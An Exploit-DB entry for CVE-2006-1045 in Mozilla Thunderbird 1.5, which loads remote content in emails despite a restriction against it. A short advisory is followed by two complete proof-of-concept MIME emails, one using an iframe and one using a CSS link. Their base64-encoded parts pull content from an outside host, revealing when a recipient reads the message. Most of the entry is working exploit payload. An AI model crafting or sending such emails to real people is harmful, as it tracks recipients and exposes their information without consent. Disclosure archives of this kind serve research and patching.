Mozilla Thunderbird 1.5 - Multiple Remote Information Disclosure Vulnerabilities

EDB-ID:

27337

CVE:

2006-1045

EDB Verified:

Author:

Crashfr

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2006-02-28

Vulnerable App: 
source: https://www.securityfocus.com/bid/16881/info

Mozilla Thunderbird is susceptible to multiple remote information-disclosure vulnerabilities. These issues are due to the application's failure to properly enforce the restriction for downloading remote content in email messages.

These issues allow remote attackers to gain access to potentially sensitive information, aiding them in further attacks. Attackers may also exploit these issues to know whether and when users read email messages.

Mozilla Thunderbird version 1.5 is vulnerable to these issues; other versions may also be affected.

* Iframe Exploit :


Subject: Thunploit by CrashFr !
From: CrashFr<crashfr@chez.com>
To: CrashFr<crashfr@chez.com>
Content-Type: multipart/related; type="multipart/alternative";
boundary="----=_NextPart_000_0000_DE61E470.78F38016"

This is a multi-part message in MIME format.

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0001_06199DF9.5C825A99"

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Test by CrashFr

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
<html><head>
</head><body style="margin: 0px; padding: 0px; border: 0px;">
<iframe src="cid:257481cab71f$562e86af@sysdream.com" width="100%"
height="100%" frameborder="0" marginheight="0" marginwidth="0"></iframe>
</body></html>

------=_NextPart_001_0001_06199DF9.5C825A99--

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: text/html; name="basic.html"
Content-Transfer-Encoding: base64
Content-ID: <257481cab71f$562e86af@sysdream.com>

PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5IHN0eWxlPSJtYXJnaW46IDBweDsgcGFkZGluZzogMHB4
OyBib3JkZXI6IDBweDsiPjxpZnJhbWUgc3JjPSJodHRwOi8vd3d3LnN5c2RyZWFtLmNvbSIgd2lk
dGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZnJhbWVib3JkZXI9IjAiIG1hcmdpbmhlaWdodD0iMCIg
bWFyZ2lud2lkdGg9IjAiPjwvaWZyYW1lPg==

------=_NextPart_000_0000_DE61E470.78F38016--


* CSS Exploit :


Subject: Thunploit by CrashFr !
From: CrashFr<crashfr@chez.com>
To: CrashFr<crashfr@chez.com>
Content-Type: multipart/related; type="multipart/alternative";
boundary="----=_NextPart_000_0000_DE61E470.78F38016"

This is a multi-part message in MIME format.

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0001_06199DF9.5C825A99"

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Test by CrashFr

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
<html><head>
<link rel="stylesheet" type="text/css"
href="cid:257481cab71f$562e86af@sysdream.com" /></head><body>
</body></html>

------=_NextPart_001_0001_06199DF9.5C825A99--

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: text/css; name="basic.css"
Content-Transfer-Encoding: base64
Content-ID: <257481cab71f$562e86af@sysdream.com>

QGltcG9ydCB1cmwoaHR0cDovL3d3dy5zeXNkcmVhbS5jb20vdGVzdC5jc3MpOwpib2R5IHsgYmFj
a2dyb3VuZC1jb2xvcjogI0NDQ0NDQzsgfQ==

------=_NextPart_000_0000_DE61E470.78F38016--
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services